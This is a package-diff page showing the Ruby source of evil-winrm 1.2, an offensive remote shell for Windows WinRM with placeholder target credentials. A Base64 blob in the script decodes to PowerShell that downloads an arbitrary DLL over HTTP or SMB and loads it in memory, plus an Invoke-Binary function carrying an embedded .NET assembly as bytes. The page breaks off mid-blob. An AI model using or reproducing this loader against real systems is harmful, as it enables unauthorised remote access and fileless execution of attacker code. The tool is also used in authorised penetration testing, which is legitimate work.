evil-winrm 1.2
Sign up to get free protection for your applications and to get access to all the features.
- checksums.yaml +7 -0
- data/lib/evil-winrm.rb +280 -0
- metadata +117 -0
checksums.yaml
ADDED
|
@@ -0,0 +1,7 @@
|
|
|
1
|
+
---
|
|
2
|
+
SHA256:
|
|
3
|
+
metadata.gz: ff51eedb5bb463de340855b2637dfcc1a0ad90ee84a74a33cf69a35dc410d167
|
|
4
|
+
data.tar.gz: a1b6e3d021679cdb1e5b12a53acc079ef70df336d552c4a47ff5907f92cfa64b
|
|
5
|
+
SHA512:
|
|
6
|
+
metadata.gz: ac82d4ace9b605745f31c7323e155f897e98dc30c930bb0bb9c532ba1429655381ae0de649520832a6a624c5bea5f7cbca00e7e5f8d98112b7a5085475232241
|
|
7
|
+
data.tar.gz: f8b792cfb5a3dfc7f5cb643f481af467b70b06acd0c85c55de4bc753fb0e33d947dc077dcc9b67d00e38646d4d15aa55b3c5b1a972bda3881c655fcb62328281
|
data/lib/evil-winrm.rb
ADDED
|
@@ -0,0 +1,280 @@
|
|
|
1
|
+
#!/usr/bin/ruby
|
|
2
|
+
# -*- encoding : utf-8 -*-
|
|
3
|
+
# Author: CyberVaca
|
|
4
|
+
# Twitter: https://twitter.com/CyberVaca_
|
|
5
|
+
# Based on the Alamot's original code
|
|
6
|
+
|
|
7
|
+
require 'winrm-fs'
|
|
8
|
+
require 'base64'
|
|
9
|
+
require 'readline'
|
|
10
|
+
require 'stringio'
|
|
11
|
+
require 'colorize'
|
|
12
|
+
|
|
13
|
+
# Constants
|
|
14
|
+
TYPE_INFO = 0
|
|
15
|
+
TYPE_ERROR = 1
|
|
16
|
+
TYPE_WARNING = 2
|
|
17
|
+
TYPE_DATA = 3
|
|
18
|
+
SCRIPT_VERSION = '1.1'
|
|
19
|
+
|
|
20
|
+
# Global vars
|
|
21
|
+
# Set this to false to disable colors
|
|
22
|
+
$colors_enabled = true
|
|
23
|
+
# Set the path for your scripts (ps1 files) and your executables (exe files)
|
|
24
|
+
$scripts_path = ""
|
|
25
|
+
$executables_path = ""
|
|
26
|
+
|
|
27
|
+
# Connection parameters, set your ip address or hostname, your user and password
|
|
28
|
+
conn = WinRM::Connection.new(
|
|
29
|
+
endpoint: 'http://IP:5985/wsman',
|
|
30
|
+
user: 'USER',
|
|
31
|
+
password: 'PASSWORD',
|
|
32
|
+
:no_ssl_peer_verification => true,
|
|
33
|
+
# Below, config for SSL, uncomment if needed and set cert files
|
|
34
|
+
# transport: :ssl,
|
|
35
|
+
# client_cert: 'certnew.cer',
|
|
36
|
+
# client_key: 'client.key',
|
|
37
|
+
)
|
|
38
|
+
|
|
39
|
+
file_manager = WinRM::FS::FileManager.new(conn)
|
|
40
|
+
|
|
41
|
+
def colorize(text, color = "default")
|
|
42
|
+
colors = {"default" => "38", "blue" => "34", "red" => "31", "yellow" => "1;33", "magenta" => "35"}
|
|
43
|
+
color_code = colors[color]
|
|
44
|
+
return "\033[0;#{color_code}m#{text}\033[0m"
|
|
45
|
+
end
|
|
46
|
+
|
|
47
|
+
def print_message(msg, msg_type)
|
|
48
|
+
if msg_type == TYPE_INFO then
|
|
49
|
+
msg_prefix = "Info: "
|
|
50
|
+
color = "blue"
|
|
51
|
+
elsif msg_type == TYPE_WARNING then
|
|
52
|
+
msg_prefix = "Warning: "
|
|
53
|
+
color = "yellow"
|
|
54
|
+
elsif msg_type == TYPE_ERROR then
|
|
55
|
+
msg_prefix = "Error: "
|
|
56
|
+
color = "red"
|
|
57
|
+
elsif msg_type == TYPE_DATA then
|
|
58
|
+
msg_prefix = "Data: "
|
|
59
|
+
color = 'magenta'
|
|
60
|
+
else
|
|
61
|
+
msg_prefix = "Error"
|
|
62
|
+
color = "red"
|
|
63
|
+
end
|
|
64
|
+
|
|
65
|
+
if $colors_enabled then
|
|
66
|
+
puts("#{colorize(msg_prefix + msg, color)}")
|
|
67
|
+
else
|
|
68
|
+
puts(msg_prefix + msg)
|
|
69
|
+
end
|
|
70
|
+
puts()
|
|
71
|
+
end
|
|
72
|
+
|
|
73
|
+
def check_directories(path, purpose)
|
|
74
|
+
if path == "" then
|
|
75
|
+
print_message("The directory used for " + purpose + " can't be empty. Please edit the script and set a path", TYPE_ERROR)
|
|
76
|
+
custom_exit(1)
|
|
77
|
+
end
|
|
78
|
+
|
|
79
|
+
if (/cygwin|mswin|mingw|bccwin|wince|emx/ =~ RUBY_PLATFORM) != nil then
|
|
80
|
+
# Windows
|
|
81
|
+
if path[-1] != "\\" then
|
|
82
|
+
path.concat("\\")
|
|
83
|
+
end
|
|
84
|
+
else
|
|
85
|
+
# Unix
|
|
86
|
+
if path[-1] != "/" then
|
|
87
|
+
path.concat("/")
|
|
88
|
+
end
|
|
89
|
+
end
|
|
90
|
+
|
|
91
|
+
if !File.directory?(path) then
|
|
92
|
+
print_message("The directory \"" + path + "\" used for " + purpose + " was not found", TYPE_ERROR)
|
|
93
|
+
custom_exit(1)
|
|
94
|
+
end
|
|
95
|
+
|
|
96
|
+
if purpose == "scripts" then
|
|
97
|
+
$scripts_path = path
|
|
98
|
+
elsif purpose == "executables" then
|
|
99
|
+
$executables_path = path
|
|
100
|
+
end
|
|
101
|
+
end
|
|
102
|
+
|
|
103
|
+
def silent_warnings
|
|
104
|
+
old_stderr = $stderr
|
|
105
|
+
$stderr = StringIO.new
|
|
106
|
+
yield
|
|
107
|
+
ensure
|
|
108
|
+
$stderr = old_stderr
|
|
109
|
+
end
|
|
110
|
+
|
|
111
|
+
def read_scripts(scripts)
|
|
112
|
+
files = Dir.entries(scripts).select{ |f| File.file? File.join(scripts, f) }
|
|
113
|
+
return files
|
|
114
|
+
end
|
|
115
|
+
|
|
116
|
+
def read_executables(args)
|
|
117
|
+
executables = args
|
|
118
|
+
files = Dir.glob("#{executables}*.exe", File::FNM_DOTMATCH)
|
|
119
|
+
return files
|
|
120
|
+
end
|
|
121
|
+
|
|
122
|
+
def paths(directory)
|
|
123
|
+
files = Dir.glob("#{directory}*.*", File::FNM_DOTMATCH)
|
|
124
|
+
directories = Dir.glob("#{directory}*").select {|f| File.directory? f}
|
|
125
|
+
return files + directories
|
|
126
|
+
end
|
|
127
|
+
|
|
128
|
+
def custom_exit(exit_code = 0)
|
|
129
|
+
if exit_code == 0 then
|
|
130
|
+
puts()
|
|
131
|
+
print_message("Exiting with code " + exit_code.to_s, TYPE_INFO)
|
|
132
|
+
elsif exit_code == 1 then
|
|
133
|
+
print_message("Exiting with code " + exit_code.to_s, TYPE_ERROR)
|
|
134
|
+
else
|
|
135
|
+
print_message("Exiting with code " + exit_code.to_s, TYPE_ERROR)
|
|
136
|
+
end
|
|
137
|
+
exit(exit_code)
|
|
138
|
+
end
|
|
139
|
+
|
|
140
|
+
puts()
|
|
141
|
+
print_message("Starting Evil-WinRM shell v" + SCRIPT_VERSION, TYPE_INFO)
|
|
142
|
+
check_directories($scripts_path, "scripts")
|
|
143
|
+
check_directories($executables_path, "executables")
|
|
144
|
+
functions = read_scripts($scripts_path)
|
|
145
|
+
executables = read_executables($executables_path)
|
|
146
|
+
menu = Base64.decode64("JG1lbnUgPSBAIgoKICAgX19fIF9fIF9fICBfX19fICBfICAgICAgICAgICAgICAgICAgCiAgLyAgX10gIHwgIHx8ICAgIHx8IHwgICAgICAgICAgICAgICAgIAogLyAgW198ICB8ICB8IHwgIHwgfCB8ICAgICAgICAgICAgICAgICAKfCAgICBfXSAgfCAgfCB8ICB8IHwgfF9fXyAgICAgICAgICAgICAgCnwgICBbX3wgIDogIHwgfCAgfCB8ICAgICB8ICAgICAgICAgICAgIAp8ICAgICB8XCAgIC8gIHwgIHwgfCAgICAgfCAgICAgICAgICAgICAKfF9fX19ffCBcXy8gIHxfX19ffHxfX19fX3wgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogX18gICAgX18gIF9fX18gIF9fX18gICBfX19fICAgX19fIF9fXyAKfCAgfF9ffCAgfHwgICAgfHwgICAgXCB8ICAgIFwgfCAgIHwgICB8CnwgIHwgIHwgIHwgfCAgfCB8ICBfICB8fCAgRCAgKXwgXyAgIF8gfAp8ICB8ICB8ICB8IHwgIHwgfCAgfCAgfHwgICAgLyB8ICBcXy8gIHwKfCAgYGAgICcgIHwgfCAgfCB8ICB8ICB8fCAgICBcIHwgICB8ICAgfAogXCAgICAgIC8gIHwgIHwgfCAgfCAgfHwgIC4gIFx8ICAgfCAgIHwKICBcXy9cXy8gIHxfX19ffHxfX3xfX3x8X198XF98fF9fX3xfX198CiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAoKICAgICAgICAgICAgICAgICAgICAgICAgICAgQnk6IEN5YmVyVmFjYUBIYWNrUGxheWVycwoKIkAKaWYgKCRmdW5jaW9uZXNfcHJldmlhcy5jb3VudCAtbGUgMSkgeyRmdW5jaW9uZXNfcHJldmlhcyA9IChscyBmdW5jdGlvbjopLk5hbWV9CgpmdW5jdGlvbiBsMDRkM3ItTG9hZERsbCB7CiAgICBwYXJhbShbc3dpdGNoXSRzbWIsIFtzd2l0Y2hdJGxvY2FsLCBbc3dpdGNoXSRodHRwLCBbc3RyaW5nXSRwYXRoKQoKICAgICRoZWxwPUAiCi5TWU5PUFNJUwogICAgZGxsIGxvYWRlci4KICAgIFBvd2VyU2hlbGwgRnVuY3Rpb246IGwwNGQzci1Mb2FkRGxsCiAgICBBdXRob3I6IEjDqWN0b3IgZGUgQXJtYXMgKDN2NFNpME4pCgogICAgRGVwZW5kZW5jaWFzIFJlcXVlcmlkYXM6IE5pbmd1bmEKICAgIERlcGVuZGVuY2lhcyBPcGNpb25hbGVzOiBOaW5ndW5hCi5ERVNDUklQVElPTgogICAgLgouRVhBTVBMRQogICAgbDA0ZDNyLUxvYWREbGwgLXNtYiAtcGF0aCBcXDE5Mi4xNjguMTM5LjEzMlxcc2hhcmVcXG15RGxsLmRsbAogICAgbDA0ZDNyLUxvYWREbGwgLWxvY2FsIC1wYXRoIEM6XFVzZXJzXFBlcGl0b1xEZXNrdG9wXG15RGxsLmRsbAogICAgbDA0ZDNyLUxvYWREbGwgLWh0dHAgLXBhdGggaHR0cDovL2V4YW1wbGUuY29tL215RGxsLmRsbAoKICAgIERlc2NyaXBjaW9uCiAgICAtLS0tLS0tLS0tLQogICAgRnVuY3Rpb24gdGhhdCBsb2FkIGEgYXJiaXRyYXJ5IGRsbAoiQAoKICAgIGlmICgoJHNtYiAtZXEgJGZhbHNlIC1hbmQgJGxvY2FsIC1lcSAkZmFsc2UgLWFuZCAkaHR0cCAtZXEgJGZhbHNlKSAtb3IgKCRwYXRoIC1lcSAiIiAtb3IgJHBhdGggLWVxICRudWxsKSkKICAgIHsKICAgICAgICB3cml0ZS1ob3N0ICIkaGVscGBuIgogICAgfQogICAgZWxzZQogICAgewoKICAgICAgICBpZiAoJGh0dHApCiAgICAgICAgewogICAgICAgICAgICBXcml0ZS1Ib3N0ICJbK10gUmVhZGluZyBkbGwgYnkgSFRUUCIKICAgICAgICAgICAgJHdlYmNsaWVudCA9IFtTeXN0ZW0uTmV0LldlYkNsaWVudF06Om5ldygpCiAgICAgICAgICAgICRkbGwgPSAkd2ViY2xpZW50LkRvd25sb2FkRGF0YSgkcGF0aCkKICAgICAgICB9CiAgICAgICAgZWxzZQogICAgICAgIHsKICAgICAgICAgICAgaWYoJHNtYil7IFdyaXRlLUhvc3QgIlsrXSBSZWFkaW5nIGRsbCBieSBTTUIiIH0KICAgICAgICAgICAgZWxzZSB7IFdyaXRlLUhvc3QgIlsrXSBSZWFkaW5nIGRsbCBsb2NhbGx5IiB9CgogICAgICAgICAgICAkZGxsID0gW1N5c3RlbS5JTy5GaWxlXTo6UmVhZEFsbEJ5dGVzKCRwYXRoKQogICAgICAgIH0KICAgICAgICAKCiAgICAgICAgaWYgKCRkbGwgLW5lICRudWxsKQogICAgICAgIHsKICAgICAgICAgICAgV3JpdGUtSG9zdCAiWytdIExvYWRpbmcgZGxsLi4uIgogICAgICAgICAgICBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKCRkbGwpCiAgICAgICAgfQogICAgfQp9CmZ1bmN0aW9uIG1lbnUgewpbYXJyYXldJGZ1bmNpb25lc19udWV2YXMgPSAobHMgZnVuY3Rpb246IHwgV2hlcmUtT2JqZWN0IHsoJF8ubmFtZSkuTGVuZ3RoIC1nZSAiNCIgLWFuZCAkXy5uYW1lIC1ub3RsaWtlICJDbGVhci1Ib3N0KiIgLWFuZCAkXy5uYW1lIC1ub3RsaWtlICJDb252ZXJ0RnJvbS1TZGRsU3RyaW5nIiAtYW5kICRfLm5hbWUgLW5vdGxpa2UgIkZvcm1hdC1IZXgiIC1hbmQgJF8ubmFtZSAtbm90bGlrZSAiR2V0LUZpbGVIYXNoKiIgLWFuZCAkXy5uYW1lIC1ub3RsaWtlICJHZXQtVmVyYioiIC1hbmQgJF8ubmFtZSAtbm90bGlrZSAiaGVscCIgLWFuZCAkXy5uYW1lIC1uZSAiSW1wb3J0LVBvd2VyU2hlbGxEYXRhRmlsZSIgLWFuZCAkXy5uYW1lIC1uZSAiSW1wb3J0U3lzdGVtTW9kdWxlcyIgLWFuZCAkXy5uYW1lIC1uZSAiTWFpbiIgLWFuZCAkXy5uYW1lIC1uZSAibWtkaXIiIC1hbmQgJF8ubmFtZSAtbmUgImNkLi4iIC1hbmQgJF8ubmFtZSAtbmUgIm1rZGlyIiAtYW5kICRfLm5hbWUgLW5lICJtb3JlIiAtYW5kICRfLm5hbWUgLW5lICJOZXctR3VpZCIgLWFuZCAkXy5uYW1lIC1uZSAiTmV3LVRlbXBvcmFyeUZpbGUiIC1hbmQgJF8ubmFtZSAtbmUgIlBhdXNlIiAtYW5kICRfLm5hbWUgLW5lICJUYWJFeHBhbnNpb24yIiAtYW5kICRfLm5hbWUgLW5lICJwcm9tcHQiIC1hbmQgJF8ubmFtZSAtbmUgIm1lbnUiIC1hbmQgJF8ubmFtZSAtbmUgImF1dG8iIH0gfCBzZWxlY3Qtb2JqZWN0IG5hbWUgKS5uYW1lCiRtdWVzdHJhX2Z1bmNpb25lcyA9ICgkZnVuY2lvbmVzX251ZXZhcyB8IHdoZXJlIHskZnVuY2lvbmVzX3ByZWNhcmdhZGFzIC1ub3Rjb250YWlucyAkX30pIHwgZm9yZWFjaCB7ImBuWytdICRfIn0KJG11ZXN0cmFfZnVuY2lvbmVzID0gJG11ZXN0cmFfZnVuY2lvbmVzIC1yZXBsYWNlICIgICIsIiIgCiRtZW51ID0gJG1lbnUgKyAkbXVlc3RyYV9mdW5jaW9uZXMgKyAiYG4iCiRtZW51ID0gJG1lbnUgLXJlcGxhY2UgIiBbK10iLCJbK10iCldyaXRlLUhvc3QgJG1lbnUKCn0KZnVuY3Rpb24gYXV0byB7ClthcnJheV0kZnVuY2lvbmVzX251ZXZhcyA9IChscyBmdW5jdGlvbjogfCBXaGVyZS1PYmplY3QgeygkXy5uYW1lKS5MZW5ndGggLWdlICI0IiAtYW5kICRfLm5hbWUgLW5vdGxpa2UgIkNsZWFyLUhvc3QqIiAtYW5kICRfLm5hbWUgLW5vdGxpa2UgIkNvbnZlcnRGcm9tLVNkZGxTdHJpbmciIC1hbmQgJF8ubmFtZSAtbm90bGlrZSAiRm9ybWF0LUhleCIgLWFuZCAkXy5uYW1lIC1ub3RsaWtlICJHZXQtRmlsZUhhc2gqIiAtYW5kICRfLm5hbWUgLW5vdGxpa2UgIkdldC1WZXJiKiIgLWFuZCAkXy5uYW1lIC1ub3RsaWtlICJoZWxwIiAtYW5kICRfLm5hbWUgLW5lICJJbXBvcnQtUG93ZXJTaGVsbERhdGFGaWxlIiAtYW5kICRfLm5hbWUgLW5lICJJbXBvcnRTeXN0ZW1Nb2R1bGVzIiAtYW5kICRfLm5hbWUgLW5lICJNYWluIiAtYW5kICRfLm5hbWUgLW5lICJta2RpciIgLWFuZCAkXy5uYW1lIC1uZSAiY2QuLiIgLWFuZCAkXy5uYW1lIC1uZSAibWtkaXIiIC1hbmQgJF8ubmFtZSAtbmUgIm1vcmUiIC1hbmQgJF8ubmFtZSAtbmUgIk5ldy1HdWlkIiAtYW5kICRfLm5hbWUgLW5lICJOZXctVGVtcG9yYXJ5RmlsZSIgLWFuZCAkXy5uYW1lIC1uZSAiUGF1c2UiIC1hbmQgJF8ubmFtZSAtbmUgIlRhYkV4cGFuc2lvbjIiIC1hbmQgJF8ubmFtZSAtbmUgInByb21wdCIgLWFuZCAkXy5uYW1lIC1uZSAibWVudSIgfSB8IHNlbGVjdC1vYmplY3QgbmFtZSApLm5hbWUKJG11ZXN0cmFfZnVuY2lvbmVzID0gKCRmdW5jaW9uZXNfbnVldmFzIHwgd2hlcmUgeyRmdW5jaW9uZXNfcHJlY2FyZ2FkYXMgLW5vdGNvbnRhaW5zICRffSkgfCBmb3JlYWNoIHsiJF9gbiJ9CiRtdWVzdHJhX2Z1bmNpb25lcyA9ICRtdWVzdHJhX2Z1bmNpb25lcyAtcmVwbGFjZSAiICAiLCIiIAokbXVlc3RyYV9mdW5jaW9uZXMKCgp9CgpmdW5jdGlvbiBJbnZva2UtQmluYXJ5IHtwYXJhbShbYXJyYXldJGFyZ3VtZW50b3MpCmlmICgkYXJndW1lbnRvcyAtZXEgJG51bGwpIHticmVha30KW1JlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dQCg3NywgOTAsIDE0NCwgMCwgMywgMCwgMCwgMCwgNCwgMCwgMCwgMCwgMjU1LCAyNTUsIDAsIDAsIDE4NCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjQsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDEyOCwgMCwgMCwgMCwgMTQsIDMxLCAxODYsIDE0LCAwLCAxODAsIDksIDIwNSwgMzMsIDE4NCwgMSwgNzYsIDIwNSwgMzMsIDg0LCAxMDQsIDEwNSwgMTE1LCAzMiwgMTEyLCAxMTQsIDExMSwgMTAzLCAxMTQsIDk3LCAxMDksIDMyLCA5OSwgOTcsIDExMCwgMTEwLCAxMTEsIDExNiwgMzIsIDk4LCAxMDEsIDMyLCAxMTQsIDExNywgMTEwLCAzMiwgMTA1LCAxMTAsIDMyLCA2OCwgNzksIDgzLCAzMiwgMTA5LCAxMTEsIDEwMCwgMTAxLCA0NiwgMTMsIDEzLCAxMCwgMzYsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDgwLCA2OSwgMCwgMCwgNzYsIDEsIDMsIDAsIDI0NSwgMTgyLCAyMzEsIDkyLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAyMjQsIDAsIDIsIDMzLCAxMSwgMSwgMTEsIDAsIDAsIDEwLCAwLCAwLCAwLCA2LCAwLCAwLCAwLCAwLCAwLCAwLCA5NCwgNDEsIDAsIDAsIDAsIDMyLCAwLCAwLCAwLCA2NCwgMCwgMCwgMCwgMCwgMCwgMTYsIDAsIDMyLCAwLCAwLCAwLCAyLCAwLCAwLCA0LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA2LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAxMjgsIDAsIDAsIDAsIDIsIDAsIDAsIDAsIDAsIDAsIDAsIDMsIDAsIDk2LCAxMzMsIDAsIDAsIDE2LCAwLCAwLCAxNiwgMCwgMCwgMCwgMCwgMTYsIDAsIDAsIDE2LCAwLCAwLCAwLCAwLCAwLCAwLCAxNiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMTIsIDQxLCAwLCAwLCA3OSwgMCwgMCwgMCwgMCwgNjQsIDAsIDAsIDQwLCAzLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA5NiwgMCwgMCwgMTIsIDAsIDAsIDAsIDIxMiwgMzksIDAsIDAsIDI4LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAzMiwgMCwgMCwgOCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgOCwgMzIsIDAsIDAsIDcyLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCA0NiwgMTE2LCAxMDEsIDEyMCwgMTE2LCAwLCAwLCAwLCAxMDAsIDksIDAsIDAsIDAsIDMyLCAwLCAwLCAwLCAxMCwgMCwgMCwgMCwgMiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMzIsIDAsIDAsIDk2LCA0NiwgMTE0LCAxMTUsIDExNCwgOTksIDAsIDAsIDAsIDQwLCAzLCAwLCAwLCAwLCA2NCwgMCwgMCwgMCwgNCwgMCwgMCwgMCwgMTIsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDY0LCAwLCAwLCA2NCwgNDYsIDExNCwgMTAxLCAxMDgsIDExMSwgOTksIDAsIDAsIDEyLCAwLCAwLCAwLCAwLCA5NiwgMCwgMCwgMCwgMiwgMCwgMCwgMCwgMTYsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDY0LCAwLCAwLCA2NiwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgNjQsIDQxLCAwLCAwLCAwLCAwLCAwLCAwLCA3MiwgMCwgMCwgMCwgMiwgMCwgNSwgMCwgMTk2LCAzMiwgMCwgMCwgMTYsIDcsIDAsIDAsIDEsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDAsIDE5LCA0OCwgNiwgMCwgMTA0LCAwLCAwLCAwLCAxLCAwLCAwLCAxNywgMCwgMTE1LCAxNSwgMCwgMCwgMTAsIDEwLCA2LCA0MCwgMTYsIDAsIDAsIDEwLCAwLCA2LCA0MCwgMTcsIDAsIDAsIDEwLCAwLCAyLCAyMiwgMTU0LCAxMTEsIDE4LCAwLCAwLCAxMCwgMTEsIDcsIDQwLCAxOSwgMCwgMCwgMTAsIDEyLCA4LCA0MCwgMjAsIDAsIDAsIDEwLCAxMywgOSwgMTExLCAyMSwgMCwgMCwgMTAsIDE5LCA0LCAxNywgNCwgMjAsIDIzLCAxNDEsIDEsIDAsIDAsIDEsIDE5LCA3LCAxNywgNywgMjIsIDIsIDIzLCA0MCwgMSwgMCwgMCwgNDMsIDQwLCAyLCAwLCAwLCA0MywgMTYyLCAxNywgNywgMTExLCAyNCwgMCwgMCwgMTAsIDM4LCA2LCAxMTEsIDE4LCAwLCAwLCAxMCwgMTksIDUsIDE3LCA1LCAxOSwgNiwgNDMsIDAsIDE3LCA2LCA0MiwgNjYsIDgzLCA3NCwgNjYsIDEsIDAsIDEsIDAsIDAsIDAsIDAsIDAsIDEyLCAwLCAwLCAwLCAxMTgsIDUyLCA0NiwgNDgsIDQ2LCA1MSwgNDgsIDUxLCA0OSwgNTcsIDAsIDAsIDAsIDAsIDUsIDAsIDEwOCwgMCwgMCwgMCwgNTYsIDIsIDAsIDAsIDM1LCAxMjYsIDAsIDAsIDE2NCwgMiwgMCwgMCwgNjgsIDMsIDAsIDAsIDM1LCA4MywgMTE2LCAxMTQsIDEwNSwgMTEwLCAxMDMsIDExNSwgMCwgMCwgMCwgMCwgMjMyLCA1LCAwLCAwLCA4LCAwLCAwLCAwLCAzNSwgODUsIDgzLCAwLCAyNDAsIDUsIDAsIDAsIDE2LCAwLCAwLCAwLCAzNSwgNzEsIDg1LCA3MywgNjgsIDAsIDAsIDAsIDAsIDYsIDAsIDAsIDE2LCAxLCAwLCAwLCAzNSwgNjYsIDEwOCwgMTExLCA5OCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMiwgMCwgMCwgMSwgNzEsIDIxLCAyLCAwLCA5LCA4LCAwLCAwLCAwLCAyNTAsIDM3LCA1MSwgMCwgMjIsIDAsIDAsIDEsIDAsIDAsIDAsIDI1LCAwLCAwLCAwLCAyLCAwLCAwLCAwLCAxLCAwLCAwLCAwLCAxLCAwLCAwLCAwLCAyNCwgMCwgMCwgMCwgMTIsIDAsIDAsIDAsIDEsIDAsIDAsIDAsIDEsIDAsIDAsIDAsIDIsIDAsIDAsIDAsIDIsIDAsIDAsIDAsIDAsIDAsIDEwLCAwLCAxLCAwLCAwLCAwLCAwLCAwLCA2LCAwLCA1NSwgMCwgNDgsIDAsIDYsIDAsIDEwMSwgMCwgNzUsIDAsIDYsIDAsIDE1MCwgMCwgMTMyLCAwLCA2LCAwLCAxNzMsIDAsIDEzMiwgMCwgNiwgMCwgMjAyLCAwLCAxMzIsIDAsIDYsIDAsIDIzMywgMCwgMTMyLCAwLCA2LCAwLCAyLCAxLCAxMzIsIDAsIDYsIDAsIDI3LCAxLCAxMzIsIDAsIDYsIDAsIDU0LCAxLCAxMzIsIDAsIDYsIDAsIDgxLCAxLCAxMzIsIDAsIDYsIDAsIDEzNywgMSwgMTA2LCAxLCA2LCAwLCAxNTcsIDEsIDEzMiwgMCwgNiwgMCwgMjAxLCAxLCAxODIsIDEsIDU1LCAwLCAyMjEsIDEsIDAsIDAsIDYsIDAsIDEyLCAyLCAyMzYsIDEsIDYsIDAsIDQ0LCAyLCAyMzYsIDEsIDYsIDAsIDkyLCAyLCA4MiwgMiwgNiwgMCwgMTA1LCAyLCA0OCwgMCwgNiwgMCwgMTEzLCAyLCA4MiwgMiwgNiwgMCwgMTQ5LCAyLCA0OCwgMCwgNiwgMCwgMTc0LCAyLCAxMzIsIDAsIDYsIDAsIDE4OCwgMiwgMTMyLCAwLCAxMCwgMCwgMjM4LCAyLCAyMjYsIDIsIDYsIDAsIDIwLCAzLCAyNDksIDIsIDYsIDAsIDQ3LCAzLCAxMzIsIDAsIDAsIDAsIDAsIDAsIDEsIDAsIDAsIDAsIDAsIDAsIDEsIDAsIDEsIDAsIDEyOSwgMSwgMTYsIDAsIDIyLCAwLCAzMSwgMCwgNSwgMCwgMSwgMCwgMSwgMCwgODAsIDMyLCAwLCAwLCAwLCAwLCAxNTAsIDAsIDYyLCAwLCAxMCwgMCwgMSwgMCwgMCwgMCwgMSwgMCwgNzAsIDAsIDE3LCAwLCAxMjYsIDAsIDE2LCAwLCAyNSwgMCwgMTI2LCAwLCAxNiwgMCwgMzMsIDAsIDEyNiwgMCwgMTYsIDAsIDQxLCAwLCAxMjYsIDAsIDE2LCAwLCA0OSwgMCwgMTI2LCAwLCAxNiwgMCwgNTcsIDAsIDEyNiwgMCwgMTYsIDAsIDY1LCAwLCAxMjYsIDAsIDE2LCAwLCA3MywgMCwgMTI2LCAwLCAxNiwgMCwgODEsIDAsIDEyNiwgMCwgMTYsIDAsIDg5LCAwLCAxMjYsIDAsIDIxLCAwLCA5NywgMCwgMTI2LCAwLCAxNiwgMCwgMTA1LCAwLCAxMjYsIDAsIDI2LCAwLCAxMjEsIDAsIDEyNiwgMCwgMzIsIDAsIDEyOSwgMCwgMTI2LCAwLCAzNywgMCwgMTM3LCAwLCAxMjYsIDAsIDM3LCAwLCAxNDUsIDAsIDEyNCwgMiwgNDEsIDAsIDE0NSwgMCwgMTMxLCAyLCA0MSwgMCwgOSwgMCwgMTQwLCAyLCA0NywgMCwgMTYxLCAwLCAxNTcsIDIsIDUxLCAwLCAxNjksIDAsIDE4MywgMiwgNTcsIDAsIDE2OSwgMCwgMTk5LCAyLCA2NCwgMCwgMTg1LCAwLCAzNCwgMywgNjksIDAsIDE4NSwgMCwgMzksIDMsIDkwLCAwLCAyMDEsIDAsIDU4LCAzLCAxMDMsIDAsIDQ2LCAwLCAxMSwgMCwgMTI2LCAwLCA0NiwgMCwgMTksIDAsIDE4MiwgMCwgNDYsIDAsIDI3LCAwLCAxOTUsIDAsIDQ2LCAwLCAzNSwgMCwgMTk1LCAwLCA0NiwgMCwgNDMsIDAsIDE5NSwgMCwgNDYsIDAsIDUxLCAwLCAxODIsIDAsIDQ2LCAwLCA1OSwgMCwgMjAxLCAwLCA0NiwgMCwgNjcsIDAsIDE5NSwgMCwgNDYsIDAsIDgzLCAwLCAxOTUsIDAsIDQ2LCAwLCA5OSwgMCwgMjIxLCAwLCA0NiwgMCwgMTA3LCAwLCAyMzAsIDAsIDQ2LCAwLCAxMTUsIDAsIDIzOSwgMCwgMTEwLCAwLCA0LCAxMjgsIDAsIDAsIDEsIDAsIDAsIDAsIDE3MSwgMjcsIDEzMCwgNzIsIDAsIDAsIDAsIDAsIDAsIDAsIDc0LCAyLCAwLCAwLCA0LCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAwLCAxLCAwLCAzOSwgMCwgMCwgMCwgMCwgMCwgNCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMCwgMSwgMCwgMj